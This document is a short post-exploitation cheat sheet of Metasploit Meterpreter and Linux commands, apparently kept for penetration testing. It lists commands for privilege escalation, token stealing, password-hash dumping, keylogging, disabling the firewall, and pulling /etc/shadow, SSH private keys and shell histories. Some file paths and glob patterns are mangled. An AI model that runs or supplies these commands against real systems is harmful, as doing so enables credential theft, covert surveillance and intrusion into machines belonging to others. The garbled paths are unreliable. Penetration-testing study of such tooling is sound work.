Meterpreter Post-exploitation Modules ◇ > use post/windows/gather/enum_logged_on_users ◇ Railgun - Meterpreter extension that allows direct access to Windows APIs ◇ IRB - ruby shell in meterpreter
Meterpreter Post Auth
- Info gathering
- getuid
- getpid
- getsprivs
- sysinfo
- screenshot
- run winenum.rb
- run scraper.rb
- run checkvm
- run credscollect
- run get_local_subnets
- Priv Esc
- ps then migrate
- getsystem
- Tokens
- list_tokens -u
- impersonate_token
- steal_token [pid]
- rev2self
- Retrieve passwords
- hashdump
- cachedump
- post/windows/gather/smart_hashdump
- post/windows/gather/credentials/vnc
- Session
- enumdesktops
- getdesktop
- setdesktop
- uictl disable keyboard
- keylog
- keyscan_start
- keyscan_dump
- keyscan_stop
- Nix Post Auth
- Disable Firewall
- /etc/init.d/iptables save
- /etc/init.d/iptables stop
- iptables-save > root/firewall.rules
- iptables-restore < /root/firewall.rules
- Files to pull
- /etc/passwd
- /etc/shadow OR /etc/security/shadow
- /etc/groups OR /etc/gshadow
- /home//.ssh/id
- /etc/sudoers
- User Information
- grep ^ssh /home/_/._hist __
- grep ^telnet /home//.hist
- grep ^mysql /home/_/._hist*